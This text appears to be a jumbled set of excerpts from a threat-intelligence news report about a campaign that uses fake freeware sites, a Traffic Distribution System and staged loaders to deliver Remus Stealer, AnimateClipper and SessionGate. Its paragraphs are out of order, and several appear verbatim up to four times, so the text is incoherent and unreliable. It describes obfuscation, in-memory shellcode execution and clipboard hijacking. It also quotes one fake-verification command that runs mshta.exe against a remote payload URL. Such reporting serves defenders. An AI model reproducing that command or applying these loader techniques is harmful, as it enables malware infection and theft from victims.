AnimateClipper

Attack chains specifically target users looking for such tools on search engines like Google, causing the bogus sites to be surfaced on top of the search results.

The JavaScript loaded by these pages listens for the user’s first interaction and intercepts it before normal navigation can proceed. On Chrome it captures a mousedown event; on Firefox it uses a click event. It then generates a TDS runtime URL, redirects the user silently, and cancels the original navigation entirely.

Hackers are creating convincing fake websites that impersonate popular security tools to trick users into downloading malware.

Despite the .rtf extension, this resource is a heavily obfuscated PowerShell script. After deobfuscation, we found that it reconstructs an additional PowerShell stage in memory and uses an RC4-based routine to decrypt the next payload.

Its beginning contains an HTA page with obfuscated VBScript, which mshta.exe executes.

This file ... is a ZIP archive containing a bundled Python environment ... and a large heavily obfuscated Python script stored in node_modules.asar ... the actual Python-based launch stage that executes shellcode and hands off execution to the next payload

The page that imitates a Cloudflare verification screen and instructs the user to run: C:\Windows\SysWOW64\mshta.exe https://185.0xA1.0xFB[.]58/navy.7z

These pages load a CloudFront-hosted JavaScript staging layer that converts a click on a “download” button/link into a handoff to a Traffic Distribution System (TDS). The TDS enforces strict gating: first-visit state, mandatory click confirmation, anti-bot/anti-analysis logic, VPN/datacenter filtering, and frequency capping.

The obfuscated script embeds a large shellcode blob directly in its body and launches it from memory. It copies the shellcode into a buffer, changes the memory protection to executable, and transfers execution to it via ntdll!LdrCallEnclave.

SessionGate — A previously unknown multi-stage loader with heavy obfuscation and extensive anti-analysis mechanisms... Because of the obfuscation techniques in use, including injected junk code, opaque predicates, and string encryption, the resulting functions become extremely bloated.

Cybersecurity researchers have flagged a large-scale operation that impersonates open-source and freeware projects to funnel unsuspecting users through a Traffic Distribution System (TDS) and deliver malware families like Remus Stealer, AnimateClipper, and the SessionGate framework.

The obfuscated script embeds a large shellcode blob directly in its body and launches it from memory. It copies the shellcode into a buffer, changes the memory protection to executable, and transfers execution to it via ntdll!LdrCallEnclave.

These pages load a CloudFront-hosted JavaScript staging layer that converts a click on a “download” button/link into a handoff to a Traffic Distribution System (TDS). The TDS enforces strict gating: first-visit state, mandatory click confirmation, anti-bot/anti-analysis logic, VPN/datacenter filtering, and frequency capping.

mshta.exe is a built-in Windows utility intended to run HTML Applications (HTA). It is often abused by threat actors because it can execute script-based content directly from a remote URL using a system binary already present on the machine.

The modules are not written to disk: they are loaded via in-memory PE manual mapping (often referred to as reflective / manual-map loading), and execution is transferred through exported functions.

AnimateClipper silently monitors the clipboard and swaps copied wallet addresses with attacker-controlled ones, potentially redirecting real funds without the victim ever realizing it.

The stealer polls the C2 using HTTP POST requests ... The malware uses HTTPS to communicate with the resolved C2 server. In the analyzed build, the observed logic includes periodic refresh check-ins

These pages load a CloudFront-hosted JavaScript staging layer that converts a click on a 'download' button/link into a handoff to a Traffic Distribution System (TDS). The TDS enforces strict gating: first-visit state, mandatory click confirmation, anti-bot/anti-analysis logic, VPN/datacenter filtering, and frequency capping.

These pages load a CloudFront-hosted JavaScript staging layer that converts a click on a “download” button/link into a handoff to a Traffic Distribution System (TDS). The TDS enforces strict gating: first-visit state, mandatory click confirmation, anti-bot/anti-analysis logic, VPN/datacenter filtering, and frequency capping.